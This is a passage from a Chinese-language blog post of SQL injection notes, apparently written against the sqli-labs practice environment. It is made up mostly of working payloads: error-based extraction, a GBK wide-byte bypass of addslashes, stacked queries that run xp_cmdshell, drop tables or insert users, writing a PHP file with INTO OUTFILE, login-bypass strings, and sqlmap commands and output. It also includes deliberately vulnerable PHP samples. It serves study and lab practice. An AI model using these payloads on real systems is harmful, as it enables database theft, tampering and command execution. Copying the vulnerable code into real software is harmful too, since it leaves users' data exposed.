<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"># 数据库数量</span><br><span class="line">admin' AND GTID_SUBSET(CONCAT(0x716b7a7071,(SELECT IFNULL(CAST(COUNT(schema_name) AS NCHAR),0x20) FROM INFORMATION_SCHEMA.SCHEMATA),0x71627a7671),8132)-- gqgS</span><br><span class="line"></span><br><span class="line"># CAST 转换数据类型</span><br><span class="line">CAST(COUNT(schema_name) AS NCHAR)</span><br><span class="line">将COUNT(schema_name)转换为NCHAR型</span><br></pre></td></tr></table></div></figure>
<p>floor(rand(0)*2)</p>
<figure class="highlight sql"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">?id<span class="operator">=</span><span class="number">1</span><span class="string">' union Select 1,count(*),concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand(0)*2))a from information_schema.columns group by a--+</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">?sort=(select count(*) from information_schema.columns group by concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand()*2)))--+</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">?sort=1'</span><span class="keyword">and</span> (<span class="keyword">select</span> <span class="built_in">count</span>(<span class="operator">*</span>) <span class="keyword">from</span> information_schema.columns <span class="keyword">group</span> <span class="keyword">by</span> concat(<span class="number">0x3a</span>,<span class="number">0x3a</span>,(<span class="keyword">select</span> <span class="keyword">user</span>()),<span class="number">0x3a</span>,<span class="number">0x3a</span>,<span class="built_in">floor</span>(rand()<span class="operator">*</span><span class="number">2</span>)))<span class="comment">--+</span></span><br></pre></td></tr></table></div></figure>
<p>double数值类型超出范围进行报错注入</p>
<figure class="highlight sql"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id<span class="operator">=</span><span class="number">1</span><span class="string">' union select (exp(~(select * FROM(SELECT USER())a))),2,3--+</span></span><br></pre></td></tr></table></div></figure>
<p>bigint溢出</p>
<figure class="highlight sql"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id<span class="operator">=</span><span class="number">1</span><span class="string">' union select (!(select * from (select user())x) - ~0),2,3--+</span></span><br></pre></td></tr></table></div></figure>
<p>利用数据的重复性</p>
<figure class="highlight sql"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id<span class="operator">=</span><span class="number">1</span><span class="string">' union select 1,2,3 from(select NAME_CONST(version(),1),NAME_CONST(version(),1))x--+</span></span><br></pre></td></tr></table></div></figure>
<h3 id="6-宽字节注入" >
<a href="#6-宽字节注入" class="heading-link"><i class="fas fa-link"></i></a><a href="#6-宽字节注入" class="headerlink" title="6 宽字节注入"></a>6 宽字节注入</h3>
<figure class="highlight sql"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">mysql在使用GBK编码的时候,会认为两个字符为一个汉字,例如<span class="operator">%</span>aa<span class="operator">%</span><span class="number">5</span>c就是一个汉字(前一个ascii码大于<span class="number">128</span>才能到汉字的范围)。我们在过滤’的时候,往往利用的思路是将‘转换为\’(转换的函数或者思路会在每一关遇到的时候介绍)。</span><br><span class="line">因此我们在此想办法将‘前面添加的\除掉,一般有两种思路:</span><br><span class="line"><span class="number">1</span>、<span class="operator">%</span>df吃掉\具体的原因是urlencode(‘\)<span class="operator">=</span><span class="operator">%</span><span class="number">5</span>c<span class="operator">%</span><span class="number">27</span>,我们在<span class="operator">%</span><span class="number">5</span>c<span class="operator">%</span><span class="number">27</span>前面添加<span class="operator">%</span>df,形成<span class="operator">%</span>df<span class="operator">%</span><span class="number">5</span>c<span class="operator">%</span><span class="number">27</span>,而上面提到的mysql在GBK编码方式的时候会将两个字节当做一个汉字,此事<span class="operator">%</span>df<span class="operator">%</span><span class="number">5</span>c就是一个汉字,<span class="operator">%</span><span class="number">27</span>则作为一个单独的符号在外面,同时也就达到了我们的目的。</span><br><span class="line"><span class="number">2</span>、将\’中的\过滤掉,例如可以构造<span class="operator">%</span><span class="operator">*</span><span class="operator">*</span><span class="operator">%</span><span class="number">5</span>c<span class="operator">%</span><span class="number">5</span>c<span class="operator">%</span><span class="number">27</span>的情况,后面的<span class="operator">%</span><span class="number">5</span>c会被前面的<span class="operator">%</span><span class="number">5</span>c给注释掉。这也是bypass的一种方法。</span><br></pre></td></tr></table></div></figure>
<p><img src="../../../picture/image-20210908111222895.png" alt="image-20210908111222895"></p>
<figure class="highlight sql"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">此处过滤使用函数addslashes()</span><br><span class="line">addslashes()函数返回在预定义字符之前添加反斜杠的字符串。</span><br><span class="line">预定义字符是:</span><br><span class="line">单引号(<span class="string">')</span></span><br><span class="line"><span class="string">双引号(")</span></span><br><span class="line"><span class="string">反斜杠(\)</span></span><br><span class="line"><span class="string">提示:该函数可用于为存储在数据库中的字符串以及数据库查询语句准备字符串。Addslashes()函数和我们在32关实现的功能基本一致的,所以我们依旧可以利用%df进行绕</span></span><br><span class="line"><span class="string">过。</span></span><br><span class="line"><span class="string">Notice:使用addslashes(),我们需要将mysql_query设置为binary的方式,才能防御此漏洞。Mysql_query(“SET character_set_connection=gbk,character_set_result=gbk,character_set_client=binary”,$conn);</span></span><br></pre></td></tr></table></div></figure>
<figure class="highlight sql"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"># sqlmap跑法</span><br><span class="line">sqlmap <span class="operator">-</span>u "http://192.168.18.12/sqlilab/Less-32/?id=1" <span class="comment">--batch --risk=3 --level=3 --random-agent - -dbs -v 3 --tamper unmagicquotes</span></span><br></pre></td></tr></table></div></figure>
<h3 id="7-堆叠注入" >
<a href="#7-堆叠注入" class="heading-link"><i class="fas fa-link"></i></a><a href="#7-堆叠注入" class="headerlink" title="7 堆叠注入"></a>7 堆叠注入</h3>
<p>适用:MySQL, SQLServer, PostgreSQL</p>
<p>不适用:Oracle</p>
<figure class="highlight sql"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">1</span> 原理</span><br><span class="line">在<span class="keyword">SQL</span>中,分号(;)是用来表示一条<span class="keyword">sql</span>语句的结束。试想一下我们在;结束一个<span class="keyword">sql</span>语句后继续构造下一条语句,会不会一起执行?因此这个想法也就造就了堆叠注入。而unioninjection(联合注入)也是将两条语句合并在一起,两者之间有什么区别么?区别就在于<span class="keyword">union</span>或者unionall执行的语句类型是有限的,可以用来执行查询语句,而堆叠注入可以执行的是任意的语句。</span><br><span class="line"><span class="keyword">Select</span> <span class="operator">*</span> <span class="keyword">from</span> products <span class="keyword">where</span> productid<span class="operator">=</span><span class="number">1</span>;<span class="keyword">DELETE</span> <span class="keyword">FROM</span> products</span><br><span class="line"></span><br><span class="line"><span class="number">2</span> 堆叠注入的局限性</span><br><span class="line">堆叠注入的局限性在于并不是每一个环境下都可以执行,可能受到API或者数据库引擎不支持的限制,当然了权限不足也可以解释为什么攻击者无法修改数据或者调用一些程序。</span><br></pre></td></tr></table></div></figure>
<p>mysql</p>
<figure class="highlight sql"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"># 新建一个表</span><br><span class="line"><span class="keyword">select</span> <span class="operator">*</span> <span class="keyword">from</span> users <span class="keyword">where</span> id<span class="operator">=</span><span class="number">1</span>;<span class="keyword">create</span> <span class="keyword">table</span> test <span class="keyword">like</span> users;</span><br><span class="line"><span class="keyword">show</span> tabkes;</span><br><span class="line"># 删除上面新建的test表</span><br><span class="line"><span class="keyword">select</span> <span class="operator">*</span> <span class="keyword">from</span> users <span class="keyword">where</span> id<span class="operator">=</span><span class="number">1</span>;<span class="keyword">drop</span> <span class="keyword">table</span> test;</span><br><span class="line"># 查询数据</span><br><span class="line"><span class="keyword">select</span> <span class="operator">*</span> <span class="keyword">from</span> users <span class="keyword">where</span> id<span class="operator">=</span><span class="number">1</span>;<span class="keyword">select</span> <span class="number">1</span>,<span class="number">2</span>,<span class="number">3</span>;</span><br><span class="line"># 加载文件</span><br><span class="line"><span class="keyword">select</span> <span class="operator">*</span> <span class="keyword">from</span> users <span class="keyword">where</span> id<span class="operator">=</span><span class="number">1</span>;<span class="keyword">select</span> load_file(<span class="string">'c:/tmpupbbn.php'</span>);</span><br><span class="line"># 修改数据</span><br><span class="line"><span class="keyword">select</span> <span class="operator">*</span> <span class="keyword">from</span> users <span class="keyword">where</span> id<span class="operator">=</span><span class="number">1</span>;<span class="keyword">insert</span> <span class="keyword">into</span> users(id,username,password) <span class="keyword">values</span>(<span class="string">'100'</span>,<span class="string">'new'</span>,<span class="string">'new'</span>);</span><br></pre></td></tr></table></div></figure>
<p>sqlserver</p>
<figure class="highlight sql"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"># 增加数据表</span><br><span class="line"><span class="keyword">select</span> <span class="operator">*</span> <span class="keyword">from</span> test;<span class="keyword">create</span> <span class="keyword">table</span> sc3(ss <span class="type">CHAR</span>(<span class="number">8</span>));</span><br><span class="line"># 删除数据表</span><br><span class="line"><span class="keyword">select</span> <span class="operator">*</span> <span class="keyword">from</span> test;<span class="keyword">drop</span> <span class="keyword">table</span> sc3;</span><br><span class="line"># 查询数据</span><br><span class="line"><span class="keyword">select</span> <span class="number">1</span>,<span class="number">2</span>,<span class="number">3</span>;<span class="keyword">select</span> <span class="operator">*</span> <span class="keyword">from</span> test;</span><br><span class="line"># 修改数据</span><br><span class="line"><span class="keyword">select</span> <span class="operator">*</span> <span class="keyword">from</span> test;update test <span class="keyword">set</span> name<span class="operator">=</span><span class="string">'test'</span> <span class="keyword">where</span> id<span class="operator">=</span><span class="number">3</span>;</span><br><span class="line"># 存储过程的执行</span><br><span class="line"><span class="keyword">select</span> <span class="operator">*</span> <span class="keyword">from</span> test <span class="keyword">where</span> id<span class="operator">=</span><span class="number">1</span>;<span class="keyword">exec</span> master..xp_cmdshell <span class="string">'ipconfig'</span></span><br></pre></td></tr></table></div></figure>
<p>PostgreSQL</p>
<figure class="highlight sql"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"># 增加数据表</span><br><span class="line"><span class="keyword">select</span> <span class="operator">*</span> <span class="keyword">from</span> user_test;<span class="keyword">create</span> <span class="keyword">table</span> user_data(id <span class="type">DATE</span>);</span><br><span class="line"><span class="keyword">select</span> <span class="operator">*</span> <span class="keyword">from</span> user_data;</span><br><span class="line"># 删除新建的user_data表</span><br><span class="line"><span class="keyword">select</span> <span class="operator">*</span> <span class="keyword">from</span> user_test;<span class="keyword">delete</span> <span class="keyword">from</span> user_data;</span><br><span class="line"># 查询数据</span><br><span class="line"><span class="keyword">select</span> <span class="operator">*</span> <span class="keyword">from</span> user_test;<span class="keyword">select</span> <span class="number">1</span>,<span class="number">2</span>,<span class="number">3</span>;</span><br><span class="line"># 修改数据</span><br><span class="line"><span class="keyword">select</span> <span class="operator">*</span> <span class="keyword">from</span> user_test;update user_test <span class="keyword">set</span> name<span class="operator">=</span><span class="string">'modify'</span> <span class="keyword">where</span> name<span class="operator">=</span><span class="string">'张三'</span>;</span><br></pre></td></tr></table></div></figure>
<h3 id="8-创建-上传文件" >
<a href="#8-创建-上传文件" class="heading-link"><i class="fas fa-link"></i></a><a href="#8-创建-上传文件" class="headerlink" title="8 创建/上传文件"></a>8 创建/上传文件</h3>
<figure class="highlight sql"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"># 创建文件内容为 <span class="operator"><</span>?phpphpinfo();?<span class="operator">></span> <span class="number">16</span>进制</span><br><span class="line">?sort<span class="operator">=</span><span class="number">1</span><span class="string">'into outfile "c:\\wamp\\www\\sqllib\\test.php"lines terminated by 0x3c3f70687020706870696e666f28293b3f3e2020--+</span></span><br></pre></td></tr></table></div></figure>
<h3 id="9-搜索型注入" >
<a href="#9-搜索型注入" class="heading-link"><i class="fas fa-link"></i></a><a href="#9-搜索型注入" class="headerlink" title="9 搜索型注入"></a>9 搜索型注入</h3>
<p><strong>原理</strong>:</p>
<figure class="highlight php"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$sql</span>=<span class="string">"select * from user where password like '%<span class="subst">$pwd</span>%' order by password"</span>;</span><br></pre></td></tr></table></div></figure>
<p>这句SQL的语句就是基于用户输入的pwd在users表中找到相应的password,正常用户当然会输入例如admin,ckse等等。但是如果有人输入这样的内容呢?</p>
<figure class="highlight php"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">'and 1=1 and '</span>%<span class="string">'='</span></span><br></pre></td></tr></table></div></figure>
<p>这样的话这句SQL语句就变成了这样:</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select * from user where password like '%fendo'and 1=1 and '%'='%' order by password</span><br></pre></td></tr></table></div></figure>
<p><strong>搜索型注入判断</strong></p>
<p>1 搜索keywords‘,如果出错的话,有90%的可能性存在漏洞;</p>
<p>2 搜索 keywords%,如果同样出错的话,就有95%的可能性存在漏洞;</p>
<p>3 搜索keywords% ‘and 1=1 and ‘%’=’(这个语句的功能就相当于普通SQL注入的 and 1=1)看返回的情况</p>
<p>4 搜索keywords% ‘and 1=2 and ‘%’=’(这个语句的功能就相当于普通SQL注入的 and 1=2)看返回的情况</p>
<p>5 根据两次的返回情况来判断是不是搜索型文本框注入了</p>
<p>下面这几种语句都可以:</p>
<figure class="highlight php"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">'and 1=1 and '</span>%<span class="string">'='</span></span><br><span class="line"></span><br><span class="line">%<span class="string">' and 1=1--'</span></span><br><span class="line"></span><br><span class="line">%<span class="string">' and 1=1 and '</span>%<span class="string">'='</span></span><br></pre></td></tr></table></div></figure>
<p><strong>实战</strong></p>
<p>1)get型注入</p>
<p>测试源码:</p>
<figure class="highlight php"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?</span></span><br><span class="line"> <span class="variable">$pwd</span>=<span class="variable">$_GET</span>[<span class="string">'pwd'</span>];</span><br><span class="line"> <span class="variable">$conn</span>=mysql_connect(<span class="string">"127.0.0.1"</span>,<span class="string">"root"</span>,<span class="string">"123"</span>);<span class="comment">//连接mysql数据库</span></span><br><span class="line"> <span class="keyword">if</span>(<span class="variable">$conn</span>){</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"连接数据库成功!"</span>; </span><br><span class="line"> }<span class="comment">//判断连接是否成功</span></span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"<br>"</span>;</span><br><span class="line"> mysql_select_db(<span class="string">'fendo'</span>,<span class="variable">$conn</span>);<span class="comment">//选择连接请求为conn的数据库(fendo)</span></span><br><span class="line"> <span class="variable">$sql</span>=<span class="string">"select * from user where password like '%<span class="subst">$pwd</span>%' order by password"</span>; <span class="comment">//字符型搜索语句</span></span><br><span class="line"> <span class="variable">$result</span>=mysql_query(<span class="variable">$sql</span>);</span><br><span class="line"> <span class="keyword">while</span>(<span class="variable">$row</span> = mysql_fetch_array(<span class="variable">$result</span>)){ </span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"用户ID:"</span>.<span class="variable">$row</span>[<span class="string">'id'</span>].<span class="string">"<br >"</span>;</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"用户名:"</span>.<span class="variable">$row</span>[<span class="string">'username'</span>].<span class="string">"<br >"</span>;</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"用户密码:"</span>.<span class="variable">$row</span>[<span class="string">'password'</span>].<span class="string">"<br >"</span>;</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"用户邮箱:"</span>.<span class="variable">$row</span>[<span class="string">'email'</span>].<span class="string">"<br >"</span>;</span><br><span class="line"> }</span><br><span class="line"> mysql_close(<span class="variable">$conn</span>); <span class="comment">//关闭数据库连接</span></span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"<hr>"</span>;</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"你当前执行的sql语句为:"</span>.<span class="string">"<br >"</span>;</span><br><span class="line"> <span class="keyword">echo</span> <span class="variable">$sql</span>;</span><br><span class="line"> <span class="meta">?></span></span><br></pre></td></tr></table></div></figure>
<p>1、判断字段数</p>
<figure class="highlight php"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">%<span class="string">' union select 1,2,3,4,...... and '</span>%<span class="string">'='</span></span><br></pre></td></tr></table></div></figure>
<p>还有种方法<br>语句:</p>
<figure class="highlight php"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">%<span class="string">' and exists (select id from user where LENGTH(username)<6 and id=1) and '</span>%<span class="string">'='</span></span><br></pre></td></tr></table></div></figure>
<p>把6这个数字逐次更换,直到他不报错为止。如下当它小于6时正确,说明字段数为5。</p>
<p>2、判断表名</p>
<p>语句:</p>
<figure class="highlight php"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">%<span class="string">'and(select count(*)from admin)>0 and '</span>%<span class="string">'='</span></span><br></pre></td></tr></table></div></figure>
<p>把admin这个表名逐次更换,直到他不报错为止,就说明这个表存在。</p>
<p>3、猜解密码</p>
<p>2)post型注入</p>
<p>测试源码:</p>
<figure class="highlight php"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?</span> </span><br><span class="line"></span><br><span class="line"><span class="comment">//--------------------------post处理--------------------------------// </span></span><br><span class="line"></span><br><span class="line"><span class="variable">$name</span>=addslashes(<span class="variable">$_POST</span>[<span class="string">'n'</span>]); </span><br><span class="line"></span><br><span class="line"><span class="variable">$pass</span>=addslashes(<span class="variable">$_POST</span>[<span class="string">'p'</span>]); </span><br><span class="line"></span><br><span class="line"><span class="variable">$conn</span> = mysql_connect(<span class="string">'127.0.0.1'</span>,<span class="string">'root'</span>,<span class="string">'123'</span>); </span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(<span class="variable">$conn</span>){ </span><br><span class="line"></span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"mysql连接成功"</span>; </span><br><span class="line"></span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"<hr>"</span>; </span><br><span class="line"></span><br><span class="line">} </span><br><span class="line"></span><br><span class="line">mysql_select_db(<span class="string">'fendo'</span>,<span class="variable">$conn</span>); </span><br><span class="line"></span><br><span class="line"><span class="variable">$sql</span>=<span class="string">"select * from user where username='<span class="subst">$name</span>' and password='<span class="subst">$pass</span>'"</span>; </span><br><span class="line"></span><br><span class="line"><span class="variable">$result</span>=mysql_query(<span class="variable">$sql</span>); </span><br><span class="line"></span><br><span class="line">mysql_close(<span class="variable">$conn</span>); </span><br><span class="line"></span><br><span class="line"><span class="keyword">while</span>(<span class="variable">$row</span> = mysql_fetch_array(<span class="variable">$result</span>)){ </span><br><span class="line"></span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"用户ID:"</span>.<span class="variable">$row</span>[<span class="string">'id'</span>].<span class="string">"<br >"</span>; </span><br><span class="line"></span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"用户名:"</span>.<span class="variable">$row</span>[<span class="string">'username'</span>].<span class="string">"<br >"</span>; </span><br><span class="line"></span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"用户密码:"</span>.<span class="variable">$row</span>[<span class="string">'password'</span>].<span class="string">"<br >"</span>; </span><br><span class="line"></span><br><span class="line">} </span><br><span class="line"></span><br><span class="line"><span class="keyword">echo</span> <span class="string">"当前执行的sql语句:"</span>.<span class="variable">$sql</span>; </span><br><span class="line"></span><br><span class="line"><span class="meta">?></span> </span><br><span class="line"></span><br><span class="line"> </span><br><span class="line"></span><br><span class="line"><form action=<span class="string">""</span> method=<span class="string">"POST"</span>> </span><br><span class="line"></span><br><span class="line">账号:<input name=<span class="string">"n"</span> type=<span class="string">"text"</span> /><br><br> </span><br><span class="line"></span><br><span class="line">密码:<input name=<span class="string">"p"</span> type=<span class="string">"text"</span> /><br><br> </span><br><span class="line"></span><br><span class="line"><input name=<span class="string">""</span> type=<span class="string">"submit"</span> value=<span class="string">"提交"</span> /> </span><br><span class="line"></span><br><span class="line"> </span><br><span class="line"></span><br><span class="line"></form> </span><br><span class="line"></span><br></pre></td></tr></table></div></figure>
<p>1、判断是否存在SQL注入</p>
<p>用PHP万能密码进行测试</p>
<figure class="highlight php"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">' or 1=1# </span></span><br></pre></td></tr></table></div></figure>
<p>在用户名里输入万能密码如果没报错,就说明存在SQL注入。</p>
<p>2、猜字段数</p>
<figure class="highlight php"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">' order by 4# </span></span><br></pre></td></tr></table></div></figure>
<p>逐次更改数字去猜,直到不报错为止。</p>
<p>3、猜表名</p>
<figure class="highlight php"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">'or 1=1 union select 1,2,3,4 # </span></span><br></pre></td></tr></table></div></figure>
<p>逐次累加数字,直到不报错为止。</p>
<p>4.猜内容</p>
<p>替换1,2,3为你想要获得的内容</p>
<figure class="highlight php"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">'or 1=1 union select username,password,3,4 from user# </span></span><br></pre></td></tr></table></div></figure>
<h3 id="10-insert-update型注入点" >
<a href="#10-insert-update型注入点" class="heading-link"><i class="fas fa-link"></i></a><a href="#10-insert-update型注入点" class="headerlink" title="10 insert/update型注入点"></a>10 insert/update型注入点</h3>
<figure class="highlight sql"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"># 布尔注入</span><br><span class="line"><span class="keyword">Parameter</span>: sex (POST)</span><br><span class="line"> Type: <span class="type">boolean</span><span class="operator">-</span>based blind</span><br><span class="line"> Title: MySQL RLIKE <span class="type">boolean</span><span class="operator">-</span>based blind <span class="operator">-</span> <span class="keyword">WHERE</span>, <span class="keyword">HAVING</span>, <span class="keyword">ORDER</span> <span class="keyword">BY</span> <span class="keyword">or</span> <span class="keyword">GROUP</span> <span class="keyword">BY</span> clause</span><br><span class="line"> Payload: sex<span class="operator">=</span>a<span class="string">' RLIKE (SELECT (CASE WHEN (5274=5274) THEN 0x61 ELSE 0x28 END))-- sQlU&phonenum=a&add=a&email=a&submit=submit</span></span><br><span class="line"><span class="string"> Vector: RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END))</span></span><br><span class="line"><span class="string"> </span></span><br><span class="line"><span class="string"># 报错注入</span></span><br><span class="line"><span class="string"> Type: error-based</span></span><br><span class="line"><span class="string"> Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)</span></span><br><span class="line"><span class="string"> Payload: sex=a'</span> <span class="keyword">AND</span> EXTRACTVALUE(<span class="number">3124</span>,CONCAT(<span class="number">0x5c</span>,<span class="number">0x716b767a71</span>,(<span class="keyword">SELECT</span> (ELT(<span class="number">3124</span><span class="operator">=</span><span class="number">3124</span>,<span class="number">1</span>))),<span class="number">0x7162626a71</span>))<span class="comment">-- bRMD&phonenum=a&add=a&email=a&submit=submit</span></span><br><span class="line"> Vector: <span class="keyword">AND</span> EXTRACTVALUE([RANDNUM],CONCAT(<span class="string">'\'</span>,<span class="string">'[DELIMITER_START]'</span>,([QUERY]),<span class="string">'[DELIMITER_STOP]'</span>))</span><br><span class="line"> </span><br><span class="line"># 延时注入</span><br><span class="line"> Type: <span class="type">time</span><span class="operator">-</span>based blind</span><br><span class="line"> Title: MySQL <span class="operator">>=</span> <span class="number">5.0</span><span class="number">.12</span> RLIKE <span class="type">time</span><span class="operator">-</span>based blind (query SLEEP)</span><br><span class="line"> Payload: sex<span class="operator">=</span>a<span class="string">' RLIKE (SELECT 6187 FROM (SELECT(SLEEP(5)))jLem)-- yIsA&phonenum=a&add=a&email=a&submit=submit</span></span><br><span class="line"><span class="string"> Vector: RLIKE (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</span></span><br><span class="line"><span class="string"></span></span><br></pre></td></tr></table></div></figure>
<h3 id="sqlmap用法" >
<a href="#sqlmap用法" class="heading-link"><i class="fas fa-link"></i></a><a href="#sqlmap用法" class="headerlink" title="*sqlmap用法"></a>*sqlmap用法</h3>
<p>获取数据库信息</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap -u "http://192.168.18.12/sqlilab/Less-9/?id=1" --batch --level=3 --risk=3 --dbs</span><br></pre></td></tr></table></div></figure>
<p>获取数据表信息</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap -u "http://192.168.18.12/sqlilab/Less-9/?id=1" --batch --level=3 --risk=3 -D security --tables</span><br></pre></td></tr></table></div></figure>
<p>获取列信息</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap -u "http://192.168.18.12/sqlilab/Less-9/?id=1" --batch --level=3 --risk=3 -D security -T em ails --columns</span><br></pre></td></tr></table></div></figure>
<p>读取数据</p>
